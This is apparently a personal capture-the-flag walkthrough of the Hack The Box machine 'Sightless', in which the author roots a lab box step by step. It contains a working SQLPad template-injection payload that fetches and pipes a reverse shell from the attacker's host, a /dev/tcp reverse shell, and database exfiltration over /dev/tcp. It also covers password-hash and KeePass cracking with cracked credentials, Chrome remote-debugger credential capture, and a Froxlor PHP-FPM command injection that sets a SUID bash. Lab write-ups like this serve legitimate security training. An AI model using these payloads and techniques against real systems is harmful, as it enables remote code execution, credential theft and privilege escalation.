Sightless
Recon
└─$ grep sight /etc/hosts
10.129.162.59 sightless.htbHTTP (80)
In the listed services one of the link leads to sqlpad subdomain. Updated hosts.
SQLPad
SQLPad version is 6.10.0
CVE-2022-0944
https://app.opencve.io/cve/?&vendor=sqlpad&product=sqlpadhttps://app.opencve.io/cve/CVE-2022-0944https://github.com/sqlpad/sqlpad/commit/3f92be386c6cd3e5eba75d85f0700d3ef54daf73https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb
As always fucking curl doesn't work, but wget works. spawn the shell.
Reverse Shell
Rev
/bin/bash -i >& /dev/tcp/10.10.14.43/4444 0>&1Payload
{{ process.mainModule.require('child_process').exec('wget 10.10.14.43/rev -qO-|bash') }}root@c184118df0a6:/var/lib/sqlpad# ls -alh
total 208K
drwxr-xr-x 4 root root 4.0K Sep 7 19:41 .
drwxr-xr-x 1 root root 4.0K Mar 12 2022 ..
drwxr-xr-x 2 root root 4.0K Aug 9 11:17 cache
-rw-r--r-- 1 root root 293 Sep 7 19:38 index.html
-rw-r--r-- 1 root root 293 Sep 7 19:38 index.html.1
drwxr-xr-x 2 root root 4.0K Aug 9 11:17 sessions
-rw-r--r-- 1 root root 184K Sep 7 19:41 sqlpad.sqlite
-rw-r--r-- 1 root root 0 Sep 7 19:13 tSQLPad Database
root@c184118df0a6:/var/lib/sqlpad# cat sqlpad.sqlite | base64 > /dev/tcp/10.10.14.43/4444
---
└─$ listen > sqlpad.sqlite.base64
└─$ cat sqlpad.sqlite.base64 | base64 -d > sqlpad.sqlite
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin (?)
1g 0:00:05:45 DONE (2024-09-08 00:07) 0.002898g/s 57.59p/s 57.59c/s 57.59C/s berna..vangogh
Use the "--show" option to display all of the cracked passwords reliably
Session completedMichael
root@c184118df0a6:/# wget -qO- 10.10.14.43/lp.sh | sh | tee /tmp/lp.log
...
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/perl
/usr/bin/wget
...
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? .............
...
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
...Nothing in the home directory, but we can try to crack the password.
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blindside (?)
1g 0:00:00:24 DONE (2024-09-08 00:23) 0.04121g/s 1645p/s 1645c/s 1645C/s toutou..promo2007
Use the "--show" option to display all of the cracked passwords reliably
Session completedroot hash password is insaneclownposse
Creds:
root:insaneclownposseCreds:michael:blindside
SSH
Creds:
michael:insaneclownposse
User.txt
michael@sightless:~$ cat user.txt
7a77327fb60d0f9fb017e7653e96cd48Privilege Escalation
michael@sightless:~$ curl 10.10.14.43/lp.sh|sh|tee /tmp/lp.log
...
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
...
john 1178 0.0 0.0 2892 988 ? Ss Sep05 0:00 _ /bin/sh -c sleep 110 && /usr/bin/python3 /home/john/automation/administration.py
john 1559 0.0 0.6 33660 24416 ? S Sep05 1:57 _ /usr/bin/python3 /home/john/automation/administration.py
john 1560 0.3 0.3 33630172 15068 ? Sl Sep05 13:06 _ /home/john/automation/chromedriver --port=36347
john 1571 0.6 2.8 34011320 114288 ? Sl Sep05 21:42 | _ /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.PDL79u data:,
john 1577 0.0 1.4 34112452 56124 ? S Sep05 0:00 | _ /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1573 --enable-crash-reporter
john 1593 0.3 3.2 34363116 128216 ? Sl Sep05 13:24 | | _ /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=1573 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --fie
john 1578 0.0 1.4 34112456 56308 ? S Sep05 0:00 | _ /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1573 --enable-crash-reporter
john 1623 2.9 5.9 1186800240 234540 ? Rl Sep05 101:39 | | _ /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1573 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1725533755882910 --launc
john 1595 0.1 2.1 33900068 87048 ? Sl Sep05 4:51 | _ /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=1573 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,8587652901750450691,3965728681123045342,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
root 1149 0.0 1.1 1874776 47408 ? Ssl Sep05 1:28 /usr/bin/containerd
...
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Sep 3 11:55 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Sep 3 11:55 /etc/apache2/sites-enabled
-rw-r--r-- 1 root root 770 Sep 3 11:55 /etc/apache2/sites-enabled/10_froxlor_ipandport_192.168.1.118.80.conf
<VirtualHost 192.168.1.118:80>
DocumentRoot "/var/www/html/froxlor"
ServerName admin.sightless.htb
<Directory "/lib/">
<Files "userdata.inc.php">
Require all denied
</Files>
</Directory>
<DirectoryMatch "^/(bin|cache|logs|tests|vendor)/">
Require all denied
</DirectoryMatch>
<FilesMatch \.(php)$>
<If "-f %{SCRIPT_FILENAME}">
SetHandler proxy:unix:/var/lib/apache2/fastcgi/1-froxlor.panel-admin.sightless.htb-php-fpm.socket|fcgi://localhost
</If>
</FilesMatch>
<Directory "/var/www/html/froxlor/">
CGIPassAuth On
</Directory>
</VirtualHost>
-rw-r--r-- 1 root root 917 Sep 3 11:55 /etc/apache2/sites-enabled/34_froxlor_normal_vhost_web1.sightless.htb.conf
<VirtualHost 192.168.1.118:80>
ServerName web1.sightless.htb
ServerAlias *.web1.sightless.htb
ServerAdmin john@sightless.htb
DocumentRoot "/var/customers/webs/web1"
<Directory "/var/customers/webs/web1/">
<FilesMatch \.(php)$>
<If "-f %{SCRIPT_FILENAME}">
SetHandler proxy:unix:/var/lib/apache2/fastcgi/1-web1-web1.sightless.htb-php-fpm.socket|fcgi://localhost
</If>
</FilesMatch>
CGIPassAuth On
Require all granted
AllowOverride All
</Directory>
Alias /goaccess "/var/customers/webs/web1/goaccess"
LogLevel warn
ErrorLog "/var/customers/logs/web1-error.log"
CustomLog "/var/customers/logs/web1-access.log" combined
</VirtualHost>
-rw-r--r-- 1 root root 1480 Aug 2 09:05 /etc/apache2/sites-enabled/002-sqlpad.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName sqlpad.sightless.htb
ServerAlias sqlpad.sightless.htb
ProxyPreserveHost On
ProxyPass / http://127.0.0.1:3000/
ProxyPassReverse / http://127.0.0.1:3000/
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 264 Sep 3 11:55 /etc/apache2/sites-enabled/05_froxlor_dirfix_nofcgid.conf
<Directory "/var/customers/webs/">
Require all granted
AllowOverride All
</Directory>
lrwxrwxrwx 1 root root 35 May 15 04:27 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost 127.0.0.1:8080>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/froxlor
ServerName admin.sightless.htb
ServerAlias admin.sightless.htb
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 412 Sep 3 11:55 /etc/apache2/sites-enabled/40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf
<Directory "/var/customers/webs/web1/goaccess/">
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /etc/apache2/froxlor-htpasswd/1-666d99c49b2986e75ed93e591b7eb6c8.htpasswd
require valid-user
</Directory>
drwxr-xr-x 2 root root 4096 Aug 9 11:17 /etc/nginx/sites-enabled
drwxr-xr-x 2 root root 4096 Aug 9 11:17 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 May 21 18:06 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
listen *:80;
server_name sightless.htb;
location / {
root /var/www/sightless;
index index.html;
}
if ($host != sightless.htb) {
rewrite ^ http://sightless.htb/;
}
}
-rw-r--r-- 1 root root 249 Aug 9 07:18 /etc/nginx/sites-enabled/main
server {
listen 80;
server_name sqlpad.sightless.htb;
location / {
proxy_pass http://localhost:3000;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
-rw-r--r-- 1 root root 1414 Aug 9 07:04 /etc/apache2/sites-available/000-default.conf
<VirtualHost 127.0.0.1:8080>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/froxlor
ServerName admin.sightless.htb
ServerAlias admin.sightless.htb
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 May 15 04:27 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost 127.0.0.1:8080>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/froxlor
ServerName admin.sightless.htb
ServerAlias admin.sightless.htb
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
...
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 5922 May 15 04:24 /etc/vsftpd.conf
anonymous_enable=YES
local_enable
#write_enable=YES
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#chown_uploads=YES
#chown_username=whoever
anon_root=/var/ftp/
...Froxlor
Updating host with admin subdomain goes redirects to the main domain. Start ssh session, but with port forwarding. (Update localhost to point to admin subdomain, otherwise it fails)
└─$ ssh michael@sightless.htb -L 8000:0:8080
└─$ head -1 /etc/hosts
127.0.0.1 localhost admin.sightless.htb
michael@sightless:~$ curl 10.10.14.43/pspy64 -so /tmp/pspy
michael@sightless:~$ chmod u+x /tmp/pspy
michael@sightless:~$ /tmp/pspy
...
2024/09/07 20:48:20 CMD: UID=0 PID=2 |
2024/09/07 20:48:20 CMD: UID=0 PID=1 | /sbin/init
2024/09/07 20:48:27 CMD: UID=1001 PID=111831 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:48:27 CMD: UID=1001 PID=111832 | sleep 60
2024/09/07 20:49:27 CMD: UID=1001 PID=111845 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:49:27 CMD: UID=1001 PID=111846 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:50:01 CMD: UID=0 PID=111860 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0 PID=111859 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0 PID=111862 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0 PID=111863 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0 PID=111864 | /bin/sh -c /usr/bin/nice -n 5 /usr/bin/php -q /var/www/html/froxlor/bin/froxlor-cli froxlor:cron 'tasks' -q 1> /dev/null
2024/09/07 20:50:01 CMD: UID=0 PID=111865 | /bin/sh -c /root/scripts/clean_up/sqlpad/default_sqlpad.sh
2024/09/07 20:50:01 CMD: UID=0 PID=111866 | bash /root/scripts/clean_up/sqlpad/default_sqlpad.sh
2024/09/07 20:50:01 CMD: UID=0 PID=111867 | bash /root/scripts/clean_up/sqlpad/default_sqlpad.sh
2024/09/07 20:50:01 CMD: UID=0 PID=111868 |
2024/09/07 20:50:01 CMD: UID=0 PID=111869 | sh -c stty -a | grep columns
2024/09/07 20:50:01 CMD: UID=0 PID=111870 | grep columns
2024/09/07 20:50:01 CMD: UID=0 PID=111871 |
2024/09/07 20:50:01 CMD: UID=0 PID=111873 | grep columns
2024/09/07 20:50:01 CMD: UID=0 PID=111872 |
2024/09/07 20:50:01 CMD: UID=0 PID=111874 | sh -c chown -R froxlorlocal:froxlorlocal '/var/www/html/froxlor/'
2024/09/07 20:50:01 CMD: UID=0 PID=111875 | sh -c chown -R froxlorlocal:froxlorlocal '/var/www/html/froxlor/'
2024/09/07 20:50:10 CMD: UID=0 PID=111876 |
2024/09/07 20:50:27 CMD: UID=1001 PID=111882 | pgrep -f /opt/google/chrome/chrome
2024/09/07 20:50:27 CMD: UID=1001 PID=111883 | sleep 60
2024/09/07 20:51:27 CMD: UID=1001 PID=111901 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:51:27 CMD: UID=1001 PID=111902 |
...The chrome debugger is known to be vulnerable.
john 1560 0.3 0.3 33630172 15164 ? Sl Sep05 13:12 /home/john/automation/chromedriver --port=36347Port forward both ports.
└─$ ssh michael@sightless.htb -L 8000:0:8080 -L 36347:0:36347https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/
Visit chrome://inspect/#devices
The ps showed that 36347 port was used, but chrome didn't discover anything. Port forward all high ports.
└─$ ssh michael@sightless.htb -L 8000:0:8080 -L 36347:0:36347 -L 34233:0:34233 -L 33101:0:33101 -L 33060:0:33060localhost:34233 worked.
The process logs every 5 second or so, we can observe the Network traffic and grab username/password.
Creds:
admin:ForlorfroxAdmin
Admin Panel
I have been browsing for some time and it seems like from admin I went to web1
Traffic > Customers > Table > web1 --> We become web1
As web1 we can change password on FTP without previous one.
FTP
ftp command fails because of SSL, use lftp
└─$ lftp web1@sightless.htb
lftp web1@sightless.htb:~> ls
ls: Fatal error: Certificate verification: The certificate is NOT trusted. The certificate issuer is unknown. (A1:4B:95:93:0A:CF:15:CD:DD:52:68:ED:DB:5B:92:ED:F0:F3:3C:69)
lftp web1@sightless.htb:~> set ssl:verify-certificate no
lftp web1@sightless.htb:/> ls -alhR
drwxr-x--- 3 web1 web1 4.0k Aug 2 07:02 .
drwxr-x--- 3 web1 web1 4.0k Aug 2 07:02 ..
drwxr-xr-x 3 web1 web1 4.0k May 17 03:17 goaccess
-rw-r--r-- 1 web1 web1 8.2k Mar 29 10:29 index.html
goaccess:
drwxr-xr-x 3 web1 web1 4.0k May 17 03:17 .
drwxr-x--- 3 web1 web1 4.0k Aug 2 07:02 ..
drwxr-xr-x 2 web1 web1 4.0k Aug 2 07:14 backup
goaccess/backup:
drwxr-xr-x 2 web1 web1 4.0k Aug 2 07:14 .
drwxr-xr-x 3 web1 web1 4.0k May 17 03:17 ..
-rw-r--r-- 1 web1 web1 5.2k Aug 6 14:29 Database.kdb
lftp web1@sightless.htb:/> get goaccess/backup/Database.kdbKeePass
└─$ file Database.kdb
Database.kdb: Keepass password database 1.x KDB, 8 groups, 4 entries, 600000 key transformation rounds
└─$ keepass2john Database.kdb > Database.hash
Inlining Database.kdb
└─$ cat Database.hash | clip
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl"
Use the "--format=KeePass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldogs (Database.kdb)
1g 0:00:01:53 DONE (2024-09-08 02:10) 0.008845g/s 9.341p/s 9.341c/s 9.341C/s kucing..stars
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Root
Creds:
root:q6gnLTB74L132TMdFCpK
ssh didn't like the downloaded key and kept giving crypto errors. Solution: https://unix.stackexchange.com/a/734936
└─$ chmod 600 id_rsa
└─$ dos2unix id_rsa
dos2unix: converting file id_rsa to Unix format...
└─$ ssh root@10.129.162.59 -i id_rsa
Last login: Tue Sep 3 08:18:45 2024
root@sightless:~# id
uid=0(root) gid=0(root) groups=0(root)Root.txt
root@sightless:~# cat root.txt
c231fb47d333b24c759af588af96dc18Unintended steps (?)
that is the LFI code, you have to use suppress_origin=True in the ws connection and you can do some LFIhttps://gist.github.com/pich4ya/5e7d3d172bb4c03360112fd270045e05
and
Go to PHP > PHP-FPM versions and create a new PHP-FPM version.
In the PHP-FPM restart command field, enter:
chmod 4000 /bin/bash
Save the changes.
Go to http://127.0.0.1:8080/admin_settings.php?start=phpfpm, disable PHP-FPM, and save. Then, re-enable PHP-FPM and save. This will execute the chmod command.
After this, from Michael’s account, execute:
/bin/bash -p
This will give you a bash shell with root privileges.
If it doesn’t work immediately, repeat the process until it takes effect.
# Note: From the chatter this may take up to 4-5minutes (?)and
sarperavci > Disclosing Froxlor V2.x Authenticated RCE as Root Vulnerability via PHP-FPM ??
Last updated